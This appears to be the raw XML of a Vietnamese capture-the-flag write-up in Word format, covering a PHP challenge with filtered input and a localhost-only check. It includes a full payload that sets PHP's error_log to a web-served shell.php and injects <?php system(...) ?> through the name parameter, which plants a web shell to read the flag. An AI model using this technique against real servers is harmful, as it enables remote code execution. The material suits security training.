        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="511FBE85" w14:textId="62F42F34" w:rsidR="007F5599" w:rsidRDefault="007F5599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Biến name bị filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E3ED7" w14:textId="45D9A345" w:rsidR="000E20DB" w:rsidRDefault="007F5599" w:rsidP="00FD52A6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00B9F5" wp14:editId="5B9A346A">
            <wp:extent cx="5613400" cy="187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962F6" w14:textId="0536497E" w:rsidR="007F5599" w:rsidRDefault="007F5599" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EAE1D40" w14:textId="0D9C19F0" w:rsidR="007F5599" w:rsidRDefault="007F5599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Ứng dụng web chặn &lt;, &gt;, ?, *, |, &amp;, ;, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5599">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5599">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5599">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389BB540" w14:textId="48852068" w:rsidR="00194B9A" w:rsidRDefault="00194B9A" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F32EB03" w14:textId="74E33894" w:rsidR="00194B9A" w:rsidRDefault="00194B9A" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00194B9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chỉ có localhost mới được thực thi lệnh từ xa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F017F0" wp14:editId="7DCDDDE9">
            <wp:extent cx="5943600" cy="7727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8166" w14:textId="572E00BE" w:rsidR="00F336B8" w:rsidRDefault="00F336B8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Không có cách nào bypass được </w:t>
      </w:r>
      <w:r w:rsidRPr="00F336B8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$_SERVER["REMOTE_ADDR"] == "127.0.0.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADF53B0" w14:textId="77777777" w:rsidR="00F336B8" w:rsidRDefault="00F336B8" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B04EED1" w14:textId="5039385B" w:rsidR="008605CC" w:rsidRDefault="008605CC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Bài này cho mình tự set cấu hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C22C0" w14:textId="3E33C83C" w:rsidR="00194B9A" w:rsidRDefault="008605CC" w:rsidP="00FD52A6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3909CC7" wp14:editId="61EDCC3D">
            <wp:extent cx="3429000" cy="12573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8315" w14:textId="79D29BEF" w:rsidR="008605CC" w:rsidRDefault="008605CC" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB521D4" w14:textId="2FB9BB2B" w:rsidR="008605CC" w:rsidRDefault="00EE31D6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Cấu hình display_errors quyết định các lỗi có được in ra màn hình cho người dùng không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E3C0A" w14:textId="6B61EFD2" w:rsidR="000F2A19" w:rsidRDefault="000F2A19" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273A413B" w14:textId="253EEE94" w:rsidR="000F2A19" w:rsidRDefault="000F2A19" w:rsidP="00FD52A6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7EF3C14" wp14:editId="12BC0707">
            <wp:extent cx="5943600" cy="31515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773C" w14:textId="6F121FF8" w:rsidR="00AF4AE0" w:rsidRDefault="00AF4AE0" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256171F2" w14:textId="19A64A21" w:rsidR="00AF4AE0" w:rsidRDefault="00DD6597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Ứng dụng web báo lỗi không có tham số name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B768585" w14:textId="2CECF544" w:rsidR="00436088" w:rsidRDefault="00436088" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198A0327" w14:textId="74A39F88" w:rsidR="00436088" w:rsidRDefault="00436088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Cấu hình error</w:t>
      </w:r>
      <w:r w:rsidR="00A21CE0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log</w:t>
      </w:r>
      <w:r w:rsidR="00A21CE0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F336B8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tên tập tin mà các lỗi được ghi log. Tập tin có thể ghi bởi người dùng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442C1121" w14:textId="6999E80B" w:rsidR="00F336B8" w:rsidRDefault="00F336B8" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5067CBA8" w14:textId="65DB4059" w:rsidR="00F336B8" w:rsidRDefault="00F336B8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Biến name được ghi vào error log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27407AF6" w14:textId="6FBA0708" w:rsidR="00F336B8" w:rsidRDefault="00F336B8" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EACABAD" w14:textId="049A588A" w:rsidR="00F336B8" w:rsidRDefault="00F336B8" w:rsidP="00FD52A6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49114F" wp14:editId="00CDDEA6">
            <wp:extent cx="5778500" cy="191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5231" w14:textId="31AAF187" w:rsidR="00F336B8" w:rsidRDefault="00F336B8" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06009AB1" w14:textId="10FFB20C" w:rsidR="00F336B8" w:rsidRDefault="00F336B8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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00952D48">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/?display_errors=1&amp;error_log=/var/www/html/shell.php&amp;name=&lt;?php system(</w:t>
      </w:r>
      <w:r w:rsidRPr="00952D48">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00952D48">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat /flag*</w:t>
      </w:r>
      <w:r w:rsidRPr="00952D48">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00952D48">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E3779" w14:textId="58D4B7C5" w:rsidR="00952D48" w:rsidRDefault="00952D48" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739AD409" w14:textId="577906C1" w:rsidR="00952D48" w:rsidRDefault="00952D48" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-56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tìm thấy 1 cấu hình của web: tìm các tập tin khác index.php và thực thi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5FAC00" w14:textId="57F47A20" w:rsidR="00952D48" w:rsidRDefault="00952D48" w:rsidP="00FD52A6">
      <w:pPr>
        <w:ind w:right="-56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8FDFFDB" wp14:editId="2EFA712E">
            <wp:extent cx="5943600" cy="7581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2D4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91E38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B026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7EE15153"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A203A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CDB"/>
    <w:rsid w:val="00037510"/>
    <w:rsid w:val="00086034"/>
    <w:rsid w:val="000C7F01"/>
    <w:rsid w:val="000E20DB"/>
    <w:rsid w:val="000F2A19"/>
    <w:rsid w:val="00126126"/>
    <w:rsid w:val="00175410"/>
    <w:rsid w:val="00194B9A"/>
    <w:rsid w:val="00215233"/>
    <w:rsid w:val="0027115C"/>
    <w:rsid w:val="002A13A2"/>
    <w:rsid w:val="002C7760"/>
    <w:rsid w:val="002D6DD9"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003A71C0"/>
    <w:rsid w:val="00436088"/>
    <w:rsid w:val="0049563E"/>
    <w:rsid w:val="004B2CA7"/>
    <w:rsid w:val="005108EE"/>
    <w:rsid w:val="00562489"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00596B70"/>
    <w:rsid w:val="005C3C97"/>
    <w:rsid w:val="0063657E"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00660A0B"/>
    <w:rsid w:val="006765EF"/>
    <w:rsid w:val="00743C9F"/>
    <w:rsid w:val="007F3348"/>
    <w:rsid w:val="007F5599"/>
    <w:rsid w:val="00803C25"/>
    <w:rsid w:val="008605CC"/>
    <w:rsid w:val="00865B18"/>
    <w:rsid w:val="00896C81"/>
    <w:rsid w:val="00901D3C"/>
    <w:rsid w:val="00936D5B"/>
    <w:rsid w:val="00952D48"/>
    <w:rsid w:val="009A7008"/>
    <w:rsid w:val="009F3B4C"/>
    <w:rsid w:val="00A21CE0"/>
    <w:rsid w:val="00A8508A"/>
    <w:rsid w:val="00AF4AE0"/>
    <w:rsid w:val="00B8230B"/>
    <w:rsid w:val="00BB43E6"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C0135F"/>
    <w:rsid w:val="00C15309"/>
    <w:rsid w:val="00C2714C"/>
    <w:rsid w:val="00CF11C5"/>
    <w:rsid w:val="00D66F95"/>
    <w:rsid w:val="00D6725D"/>
    <w:rsid w:val="00DD6597"/>
    <w:rsid w:val="00E51FC0"/>
    <w:rsid w:val="00ED1C2F"/>
    <w:rsid w:val="00EE31D6"/>
    <w:rsid w:val="00F336B8"/>
    <w:rsid w:val="00F440FC"/>
    <w:rsid w:val="00F5724C"/>
    <w:rsid w:val="00F63CDB"/>
    <w:rsid w:val="00F9152B"/>
    <w:rsid w:val="00FD5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4AEC01D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ECE1DC32-C1EA-574E-A0B8-348F80EDE1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1754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10</Pages>
  <Words>601</Words>
  <Characters>3430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41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-07T08:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-14T02:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>